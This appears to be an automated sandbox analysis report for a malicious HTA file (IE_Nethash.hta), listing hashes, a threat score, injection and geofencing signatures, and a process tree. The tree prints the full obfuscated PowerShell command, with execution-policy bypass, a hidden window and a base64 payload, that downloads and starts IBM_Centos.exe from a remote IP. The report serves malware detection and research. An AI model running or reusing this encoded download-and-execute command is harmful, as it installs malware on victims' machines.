db7af9cdd4e2f30be52cafdd9a172078e2ce30703a8d03b9897e4907583b543e

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
17/07/2023, 10:36

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

IE_Nethash.hta
Size

6KB
MD5

b4c8fe36366bf1542935f0367270eba5
SHA1

86041ff9affd923e47012ace1fe257d04a1917c9
SHA256

db7af9cdd4e2f30be52cafdd9a172078e2ce30703a8d03b9897e4907583b543e
SHA512

433431f0155b86314fc9d1331a0ab6dbcd80588a25405c9b3295b2f2ae1b4fde7c7f4313e99d26a2ab513d855f7f15fbb7ad3dfa3be228b7e0586d64fbbc8714
SSDEEP

48:3DYueubiQ/E6GvuuwsXuhXsXYXk/ovXtvSXYWdXkrFXV+3XWWQX4SXeXuKX+XvSg:TD+Q/3woFHW2rb+2W++J4eY+4UQjdxW+

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 33 IoCs

flow	pid	Process
21	3688	powershell.exe
39	1772	mshta.exe
42	1772	mshta.exe
44	1772	mshta.exe
45	1772	mshta.exe
46	1772	mshta.exe
50	1772	mshta.exe
56	1772	mshta.exe
59	1772	mshta.exe
60	1772	mshta.exe
61	1772	mshta.exe
62	1772	mshta.exe
67	1772	mshta.exe
69	1772	mshta.exe
70	1772	mshta.exe
71	1772	mshta.exe
72	1772	mshta.exe
74	1772	mshta.exe
86	1772	mshta.exe
88	1772	mshta.exe
89	1772	mshta.exe
90	1772	mshta.exe
92	1772	mshta.exe
94	1772	mshta.exe
95	1772	mshta.exe
96	1772	mshta.exe
97	1772	mshta.exe
99	1772	mshta.exe
101	1772	mshta.exe
102	1772	mshta.exe
107	1772	mshta.exe
108	1772	mshta.exe
110	1772	mshta.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation	IBM_Centos.exe

Executes dropped EXE 2 IoCs

pid	Process
2516	IBM_Centos.exe
4644	IBM_Centos.exe

Loads dropped DLL 1 IoCs

pid	Process
2516	IBM_Centos.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2516 set thread context of 4644	2516	IBM_Centos.exe	95
PID 4644 set thread context of 1772	4644	IBM_Centos.exe	83
PID 5116 set thread context of 1772	5116	control.exe	83

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3372	3784	WerFault.exe	104

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	control.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1056	PowErsHEll.Exe
1056	PowErsHEll.Exe
3688	powershell.exe
3688	powershell.exe
4644	IBM_Centos.exe
4644	IBM_Centos.exe
4644	IBM_Centos.exe
4644	IBM_Centos.exe
4644	IBM_Centos.exe
4644	IBM_Centos.exe
4644	IBM_Centos.exe
4644	IBM_Centos.exe
5116	control.exe
5116	control.exe
5116	control.exe
5116	control.exe
5116	control.exe
5116	control.exe
5116	control.exe
5116	control.exe

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
2516	IBM_Centos.exe
4644	IBM_Centos.exe
4644	IBM_Centos.exe
4644	IBM_Centos.exe
5116	control.exe
5116	control.exe
5116	control.exe
5116	control.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1056	PowErsHEll.Exe
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	4644	IBM_Centos.exe
Token: SeDebugPrivilege	5116	control.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 1772 wrote to memory of 1056	1772	mshta.exe	86
PID 1772 wrote to memory of 1056	1772	mshta.exe	86
PID 1772 wrote to memory of 1056	1772	mshta.exe	86
PID 1056 wrote to memory of 3688	1056	PowErsHEll.Exe	88
PID 1056 wrote to memory of 3688	1056	PowErsHEll.Exe	88
PID 1056 wrote to memory of 3688	1056	PowErsHEll.Exe	88
PID 3688 wrote to memory of 2516	3688	powershell.exe	94
PID 3688 wrote to memory of 2516	3688	powershell.exe	94
PID 3688 wrote to memory of 2516	3688	powershell.exe	94
PID 2516 wrote to memory of 4644	2516	IBM_Centos.exe	95
PID 2516 wrote to memory of 4644	2516	IBM_Centos.exe	95
PID 2516 wrote to memory of 4644	2516	IBM_Centos.exe	95
PID 2516 wrote to memory of 4644	2516	IBM_Centos.exe	95
PID 1772 wrote to memory of 5116	1772	mshta.exe	100
PID 1772 wrote to memory of 5116	1772	mshta.exe	100
PID 1772 wrote to memory of 5116	1772	mshta.exe	100
PID 5116 wrote to memory of 3784	5116	control.exe	104
PID 5116 wrote to memory of 3784	5116	control.exe	104
PID 5116 wrote to memory of 3784	5116	control.exe	104

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\IE_Nethash.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1772
- C:\Windows\SysWOW64\windoWSpOwERsheLl\v1.0\PowErsHEll.Exe
  "C:\Windows\SyStEM32\windoWSpOwERsheLl\v1.0\PowErsHEll.Exe" "PoWersHEll -Ex ByPaSS -NoP -w 1 -Ec IAAJAAkACQAJAAkACQAJAAkACQBbAG4ARQB0AC4AUwBlAHIAdgBJAGMAZQBwAE8ASQBOAFQATQBhAE4AQQBHAGUAUgBdADoAOgBTAEUAYwB1AHIAaQBUAFkAcAByAE8AVABPAEMAbwBMACAAIAAJAD0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBOAGUAdAAuAHMAZQBjAFUAcgBJAHQAeQBQAHIATwBUAG8AQwBvAEwAVABZAHAAZQBdADoAOgBUAGwAcwAxADIAIAAJACAACQA7ACAAIAAgACAACQAgAAkAIAAgACAACQAgACAAIAAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAFcAZwBlAHQAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKABbAEMASABhAHIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAwADQAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMAaABhAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAxADYAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMASABhAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAxADYAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMAaABhAHIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAxADIAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMASABBAHIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkANQA4ACAACQAJACAAIAAgAAkACQAgACAACQAgAAkACQAgACAAIAAJAAkAIAAgAAkAKwAgAAkACQAgACAAIAAJAAkAIAAgAAkAWwBjAEgAQQBSAF0AIAAJAAkAIAAgACAACQAJACAAIAAJADQANwAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBoAGEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQA0ADcAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMAaABBAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkANAA5ACAACQAJACAAIAAgAAkACQAgACAACQAgAAkACQAgACAAIAAJAAkAIAAgAAkAKwAgAAkACQAgACAAIAAJAAkAIAAgAAkAWwBjAGgAYQByAF0AIAAJAAkAIAAgACAACQAJACAAIAAJADQAOAAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAYwBIAEEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQA1ADEAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMASABBAHIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkANAA2ACAACQAJACAAIAAgAAkACQAgACAACQAgAAkACQAgACAAIAAJAAkAIAAgAAkAKwAgAAkACQAgACAAIAAJAAkAIAAgAAkAWwBDAEgAQQByAF0AIAAJAAkAIAAgACAACQAJACAAIAAJADQAOQAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAYwBoAEEAUgBdACAACQAJACAAIAAgAAkACQAgACAACQA1ADQAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMASABhAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkANAA2ACAACQAJACAAIAAgAAkACQAgACAACQAgAAkACQAgACAAIAAJAAkAIAAgAAkAKwAgAAkACQAgACAAIAAJAAkAIAAgAAkAWwBDAEgAQQBSAF0AIAAJAAkAIAAgACAACQAJACAAIAAJADUAMAAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBIAGEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQA0ADkAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMASABhAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkANQAzACAACQAJACAAIAAgAAkACQAgACAACQAgAAkACQAgACAAIAAJAAkAIAAgAAkAKwAgAAkACQAgACAAIAAJAAkAIAAgAAkAWwBjAGgAYQByAF0AIAAJAAkAIAAgACAACQAJACAAIAAJADQANgAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBoAEEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQA1ADAAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMAaABhAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkANQA3ACAACQAJACAAIAAgAAkACQAgACAACQAgAAkACQAgACAAIAAJAAkAIAAgAAkAKwAgAAkACQAgACAAIAAJAAkAIAAgAAkAWwBDAGgAQQByAF0AIAAJAAkAIAAgACAACQAJACAAIAAJADQANwAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAYwBoAEEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQA2ADgAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMASABBAHIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAwADEAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMAaABBAHIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAxADUAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMAaABhAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAwADcAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMASABBAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAxADYAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMASABBAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAxADEAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMAaABBAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAxADIAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMASABBAHIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkANAA3ACAACQAJACAAIAAgAAkACQAgACAACQAgAAkACQAgACAAIAAJAAkAIAAgAAkAKwAgAAkACQAgACAAIAAJAAkAIAAgAAkAWwBjAEgAYQByAF0AIAAJAAkAIAAgACAACQAJACAAIAAJADkAOQAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBoAEEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQAxADEANQAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBIAEEAUgBdACAACQAJACAAIAAgAAkACQAgACAACQAxADEANAAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAYwBoAGEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQAxADEANQAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBoAGEAUgBdACAACQAJACAAIAAgAAkACQAgACAACQAxADEANQAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBoAEEAUgBdACAACQAJACAAIAAgAAkACQAgACAACQAxADAAMgAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBIAGEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQAxADEANQAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBoAGEAUgBdACAACQAJACAAIAAgAAkACQAgACAACQA0ADYAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMAaABBAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAwADEAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMASABBAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAyADAAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMAaABhAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAwADEAIAAJAAkAIAAgACAACQAJACAAIAAJACkAIAAgACAAIAAtAG8AdQB0AEYASQBsAGUAIAAgACAACQAJACAACQAgACAACQAJAAkAIAAgAAkAIAAdICQARQBuAHYAOgBUAEUAbQBQAFwASQBCAE0AXwBDAGUAbgB0AG8AcwAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgACAAOwAgAAkACQAJACAAIAAJACAAIAAJACAAcwB0AEEAUgB0ACAAIAAJAAkACQAdICQARQBOAHYAOgBUAEUAbQBwAFwASQBCAE0AXwBDAGUAbgB0AG8AcwAuAGUAeABlAB0g "
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1056
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPaSS -NoP -w 1 -Ec IAAJAAkACQAJAAkACQAJAAkACQBbAG4ARQB0AC4AUwBlAHIAdgBJAGMAZQBwAE8ASQBOAFQATQBhAE4AQQBHAGUAUgBdADoAOgBTAEUAYwB1AHIAaQBUAFkAcAByAE8AVABPAEMAbwBMACAAIAAJAD0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBOAGUAdAAuAHMAZQBjAFUAcgBJAHQAeQBQAHIATwBUAG8AQwBvAEwAVABZAHAAZQBdADoAOgBUAGwAcwAxADIAIAAJACAACQA7ACAAIAAgACAACQAgAAkAIAAgACAACQAgACAAIAAJACAACQAJAAkACQAJAAkACQAJAAkACQAJAFcAZwBlAHQAIAAgACAAIAAgACAAIAAgACAAIAAgACAAKABbAEMASABhAHIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAwADQAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMAaABhAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAxADYAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMASABhAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAxADYAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMAaABhAHIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAxADIAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMASABBAHIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkANQA4ACAACQAJACAAIAAgAAkACQAgACAACQAgAAkACQAgACAAIAAJAAkAIAAgAAkAKwAgAAkACQAgACAAIAAJAAkAIAAgAAkAWwBjAEgAQQBSAF0AIAAJAAkAIAAgACAACQAJACAAIAAJADQANwAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBoAGEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQA0ADcAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMAaABBAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkANAA5ACAACQAJACAAIAAgAAkACQAgACAACQAgAAkACQAgACAAIAAJAAkAIAAgAAkAKwAgAAkACQAgACAAIAAJAAkAIAAgAAkAWwBjAGgAYQByAF0AIAAJAAkAIAAgACAACQAJACAAIAAJADQAOAAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAYwBIAEEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQA1ADEAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMASABBAHIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkANAA2ACAACQAJACAAIAAgAAkACQAgACAACQAgAAkACQAgACAAIAAJAAkAIAAgAAkAKwAgAAkACQAgACAAIAAJAAkAIAAgAAkAWwBDAEgAQQByAF0AIAAJAAkAIAAgACAACQAJACAAIAAJADQAOQAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAYwBoAEEAUgBdACAACQAJACAAIAAgAAkACQAgACAACQA1ADQAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMASABhAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkANAA2ACAACQAJACAAIAAgAAkACQAgACAACQAgAAkACQAgACAAIAAJAAkAIAAgAAkAKwAgAAkACQAgACAAIAAJAAkAIAAgAAkAWwBDAEgAQQBSAF0AIAAJAAkAIAAgACAACQAJACAAIAAJADUAMAAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBIAGEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQA0ADkAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMASABhAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkANQAzACAACQAJACAAIAAgAAkACQAgACAACQAgAAkACQAgACAAIAAJAAkAIAAgAAkAKwAgAAkACQAgACAAIAAJAAkAIAAgAAkAWwBjAGgAYQByAF0AIAAJAAkAIAAgACAACQAJACAAIAAJADQANgAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBoAEEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQA1ADAAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMAaABhAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkANQA3ACAACQAJACAAIAAgAAkACQAgACAACQAgAAkACQAgACAAIAAJAAkAIAAgAAkAKwAgAAkACQAgACAAIAAJAAkAIAAgAAkAWwBDAGgAQQByAF0AIAAJAAkAIAAgACAACQAJACAAIAAJADQANwAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAYwBoAEEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQA2ADgAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMASABBAHIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAwADEAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMAaABBAHIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAxADUAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMAaABhAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAwADcAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMASABBAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAxADYAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMASABBAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAxADEAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAEMAaABBAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAxADIAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMASABBAHIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkANAA3ACAACQAJACAAIAAgAAkACQAgACAACQAgAAkACQAgACAAIAAJAAkAIAAgAAkAKwAgAAkACQAgACAAIAAJAAkAIAAgAAkAWwBjAEgAYQByAF0AIAAJAAkAIAAgACAACQAJACAAIAAJADkAOQAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBoAEEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQAxADEANQAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBIAEEAUgBdACAACQAJACAAIAAgAAkACQAgACAACQAxADEANAAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAYwBoAGEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQAxADEANQAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBoAGEAUgBdACAACQAJACAAIAAgAAkACQAgACAACQAxADEANQAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBoAEEAUgBdACAACQAJACAAIAAgAAkACQAgACAACQAxADAAMgAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBIAGEAcgBdACAACQAJACAAIAAgAAkACQAgACAACQAxADEANQAgAAkACQAgACAAIAAJAAkAIAAgAAkAIAAJAAkAIAAgACAACQAJACAAIAAJACsAIAAJAAkAIAAgACAACQAJACAAIAAJAFsAQwBoAGEAUgBdACAACQAJACAAIAAgAAkACQAgACAACQA0ADYAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMAaABBAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAwADEAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMASABBAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAyADAAIAAJAAkAIAAgACAACQAJACAAIAAJACAACQAJACAAIAAgAAkACQAgACAACQArACAACQAJACAAIAAgAAkACQAgACAACQBbAGMAaABhAFIAXQAgAAkACQAgACAAIAAJAAkAIAAgAAkAMQAwADEAIAAJAAkAIAAgACAACQAJACAAIAAJACkAIAAgACAAIAAtAG8AdQB0AEYASQBsAGUAIAAgACAACQAJACAACQAgACAACQAJAAkAIAAgAAkAIAAdICQARQBuAHYAOgBUAEUAbQBQAFwASQBCAE0AXwBDAGUAbgB0AG8AcwAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgACAAOwAgAAkACQAJACAAIAAJACAAIAAJACAAcwB0AEEAUgB0ACAAIAAJAAkACQAdICQARQBOAHYAOgBUAEUAbQBwAFwASQBCAE0AXwBDAGUAbgB0AG8AcwAuAGUAeABlAB0g
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3688
  - - C:\Users\Admin\AppData\Local\Temp\IBM_Centos.exe
      "C:\Users\Admin\AppData\Local\Temp\IBM_Centos.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:2516
    - - C:\Users\Admin\AppData\Local\Temp\IBM_Centos.exe
        
        "C:\Users\Admin\AppData\Local\Temp\IBM_Centos.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        
        PID:4644
- C:\Windows\SysWOW64\autoconv.exe
  "C:\Windows\SysWOW64\autoconv.exe"
  2⤵
  PID:1780
- C:\Windows\SysWOW64\autofmt.exe
  "C:\Windows\SysWOW64\autofmt.exe"
  2⤵
  PID:1376
- C:\Windows\SysWOW64\autoconv.exe
  "C:\Windows\SysWOW64\autoconv.exe"
  2⤵
